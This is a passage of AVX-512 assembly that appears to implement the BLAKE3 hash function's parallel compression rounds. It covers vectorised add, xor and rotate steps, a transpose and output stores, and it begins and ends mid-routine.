vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm18
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm17
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm25
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm24
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm30
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm28
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm29
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm18
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm19
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm22
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm27
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm17
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm31
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm25
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm30
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm19
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm26
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm20
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpxord zmm0,zmm0,zmm8
vpxord zmm1,zmm1,zmm9
vpxord zmm2,zmm2,zmm10
vpxord zmm3,zmm3,zmm11
vpxord zmm4,zmm4,zmm12
vpxord zmm5,zmm5,zmm13
vpxord zmm6,zmm6,zmm14
vpxord zmm7,zmm7,zmm15
vpxord zmm8,zmm8,DWORD PTR [rdi]{1to16}
vpxord zmm9,zmm9,DWORD PTR [rdi+0x4]{1to16}
vpxord zmm10,zmm10,DWORD PTR [rdi+0x8]{1to16}
vpxord zmm11,zmm11,DWORD PTR [rdi+0xc]{1to16}
vpxord zmm12,zmm12,DWORD PTR [rdi+0x10]{1to16}
vpxord zmm13,zmm13,DWORD PTR [rdi+0x14]{1to16}
vpxord zmm14,zmm14,DWORD PTR [rdi+0x18]{1to16}
vpxord zmm15,zmm15,DWORD PTR [rdi+0x1c]{1to16}
vpunpckldq zmm16,zmm0,zmm1
vpunpckhdq zmm17,zmm0,zmm1
vpunpckldq zmm18,zmm2,zmm3
vpunpckhdq zmm19,zmm2,zmm3
vpunpckldq zmm20,zmm4,zmm5
vpunpckhdq zmm21,zmm4,zmm5
vpunpckldq zmm22,zmm6,zmm7
vpunpckhdq zmm23,zmm6,zmm7
vpunpckldq zmm24,zmm8,zmm9
vpunpckhdq zmm25,zmm8,zmm9
vpunpckldq zmm26,zmm10,zmm11
vpunpckhdq zmm27,zmm10,zmm11
vpunpckldq zmm28,zmm12,zmm13
vpunpckhdq zmm29,zmm12,zmm13
vpunpckldq zmm30,zmm14,zmm15
vpunpckhdq zmm31,zmm14,zmm15
vpunpcklqdq zmm0,zmm16,zmm18
vpunpckhqdq zmm1,zmm16,zmm18
vpunpcklqdq zmm2,zmm17,zmm19
vpunpckhqdq zmm3,zmm17,zmm19
vpunpcklqdq zmm4,zmm20,zmm22
vpunpckhqdq zmm5,zmm20,zmm22
vpunpcklqdq zmm6,zmm21,zmm23
vpunpckhqdq zmm7,zmm21,zmm23
vpunpcklqdq zmm8,zmm24,zmm26
vpunpckhqdq zmm9,zmm24,zmm26
vpunpcklqdq zmm10,zmm25,zmm27
vpunpckhqdq zmm11,zmm25,zmm27
vpunpcklqdq zmm12,zmm28,zmm30
vpunpckhqdq zmm13,zmm28,zmm30
vpunpcklqdq zmm14,zmm29,zmm31
vpunpckhqdq zmm15,zmm29,zmm31
vshufi32x4 zmm16,zmm0,zmm4,0x88
vshufi32x4 zmm17,zmm1,zmm5,0x88
vshufi32x4 zmm18,zmm2,zmm6,0x88
vshufi32x4 zmm19,zmm3,zmm7,0x88
vshufi32x4 zmm20,zmm0,zmm4,0xdd
vshufi32x4 zmm21,zmm1,zmm5,0xdd
vshufi32x4 zmm22,zmm2,zmm6,0xdd
vshufi32x4 zmm23,zmm3,zmm7,0xdd
vshufi32x4 zmm24,zmm8,zmm12,0x88
vshufi32x4 zmm25,zmm9,zmm13,0x88
vshufi32x4 zmm26,zmm10,zmm14,0x88
vshufi32x4 zmm27,zmm11,zmm15,0x88
vshufi32x4 zmm28,zmm8,zmm12,0xdd
vshufi32x4 zmm29,zmm9,zmm13,0xdd
vshufi32x4 zmm30,zmm10,zmm14,0xdd
vshufi32x4 zmm31,zmm11,zmm15,0xdd
vshufi32x4 zmm0,zmm16,zmm24,0x88
vshufi32x4 zmm1,zmm17,zmm25,0x88
vshufi32x4 zmm2,zmm18,zmm26,0x88
vshufi32x4 zmm3,zmm19,zmm27,0x88
vshufi32x4 zmm4,zmm20,zmm28,0x88
vshufi32x4 zmm5,zmm21,zmm29,0x88
vshufi32x4 zmm6,zmm22,zmm30,0x88
vshufi32x4 zmm7,zmm23,zmm31,0x88
vshufi32x4 zmm8,zmm16,zmm24,0xdd
vshufi32x4 zmm9,zmm17,zmm25,0xdd
vshufi32x4 zmm10,zmm18,zmm26,0xdd
vshufi32x4 zmm11,zmm19,zmm27,0xdd
vshufi32x4 zmm12,zmm20,zmm28,0xdd
vshufi32x4 zmm13,zmm21,zmm29,0xdd
vshufi32x4 zmm14,zmm22,zmm30,0xdd
vshufi32x4 zmm15,zmm23,zmm31,0xdd
vmovdqu32 ZMMWORD PTR [r9],zmm0
vmovdqu32 ZMMWORD PTR [r9+0x40],zmm1
vmovdqu32 ZMMWORD PTR [r9+0x80],zmm2
vmovdqu32 ZMMWORD PTR [r9+0xc0],zmm3
vmovdqu32 ZMMWORD PTR [r9+0x100],zmm4
vmovdqu32 ZMMWORD PTR [r9+0x140],zmm5
vmovdqu32 ZMMWORD PTR [r9+0x180],zmm6
vmovdqu32 ZMMWORD PTR [r9+0x1c0],zmm7
vmovdqu32 ZMMWORD PTR [r9+0x200],zmm8
vmovdqu32 ZMMWORD PTR [r9+0x240],zmm9
vmovdqu32 ZMMWORD PTR [r9+0x280],zmm10
vmovdqu32 ZMMWORD PTR [r9+0x2c0],zmm11
vmovdqu32 ZMMWORD PTR [r9+0x300],zmm12
vmovdqu32 ZMMWORD PTR [r9+0x340],zmm13
vmovdqu32 ZMMWORD PTR [r9+0x380],zmm14
vmovdqu32 ZMMWORD PTR [r9+0x3c0],zmm15
vmovdqa32 zmm0,ZMMWORD PTR [rsp]
vmovdqa32 zmm1,ZMMWORD PTR [rsp+0x40]
vpaddd zmm2,zmm0,DWORD PTR [ADD16+rip]{1to16}
vpcmpltud k1,zmm2,zmm0
vpaddd zmm1{k1},zmm1,DWORD PTR [ADD1+rip]{1to16}
vmovdqa32 ZMMWORD PTR [rsp],zmm2
vmovdqa32 ZMMWORD PTR [rsp+0x40],zmm1
add r9,0x400
sub r10,0x10
cmp r10,0x10
jae 3b
test r10,r10
jne 2f
9:
vzeroupper
mov rsp,rbp
pop rbp
ret
2:
test r10,0x8
je 2f
vpbroadcastd ymm16,DWORD PTR [rsi]
vpbroadcastd ymm17,DWORD PTR [rsi+0x4]
vpbroadcastd ymm18,DWORD PTR [rsi+0x8]
vpbroadcastd ymm19,DWORD PTR [rsi+0xc]
vpbroadcastd ymm20,DWORD PTR [rsi+0x10]
vpbroadcastd ymm21,DWORD PTR [rsi+0x14]
vpbroadcastd ymm22,DWORD PTR [rsi+0x18]
vpbroadcastd ymm23,DWORD PTR [rsi+0x1c]
vpbroadcastd ymm24,DWORD PTR [rsi+0x20]
vpbroadcastd ymm25,DWORD PTR [rsi+0x24]
vpbroadcastd ymm26,DWORD PTR [rsi+0x28]
vpbroadcastd ymm27,DWORD PTR [rsi+0x2c]
vpbroadcastd ymm28,DWORD PTR [rsi+0x30]
vpbroadcastd ymm29,DWORD PTR [rsi+0x34]
vpbroadcastd ymm30,DWORD PTR [rsi+0x38]
vpbroadcastd ymm31,DWORD PTR [rsi+0x3c]
vpbroadcastd ymm0,DWORD PTR [rdi]
vpbroadcastd ymm1,DWORD PTR [rdi+0x4]
vpbroadcastd ymm2,DWORD PTR [rdi+0x8]
vpbroadcastd ymm3,DWORD PTR [rdi+0xc]
vpbroadcastd ymm4,DWORD PTR [rdi+0x10]
vpbroadcastd ymm5,DWORD PTR [rdi+0x14]
vpbroadcastd ymm6,DWORD PTR [rdi+0x18]
vpbroadcastd ymm7,DWORD PTR [rdi+0x1c]
vpbroadcastd ymm8,DWORD PTR [BLAKE3_IV_0+rip]
vpbroadcastd ymm9,DWORD PTR [BLAKE3_IV_1+rip]
vpbroadcastd ymm10,DWORD PTR [BLAKE3_IV_2+rip]
vpbroadcastd ymm11,DWORD PTR [BLAKE3_IV_3+rip]
vmovdqa ymm12,YMMWORD PTR [rsp]
vmovdqa ymm13,YMMWORD PTR [rsp+0x40]
vpbroadcastd ymm14,edx
vpbroadcastd ymm15,r8d
vpaddd ymm0,ymm0,ymm16
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm20
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm17
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm21
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm24
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm28
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm25
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm29
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm18
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm23
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm22
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm16
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm17
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm25
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm27
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm30
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm19
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm29
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm20
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm18
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm22
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm27
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm21
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm31
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
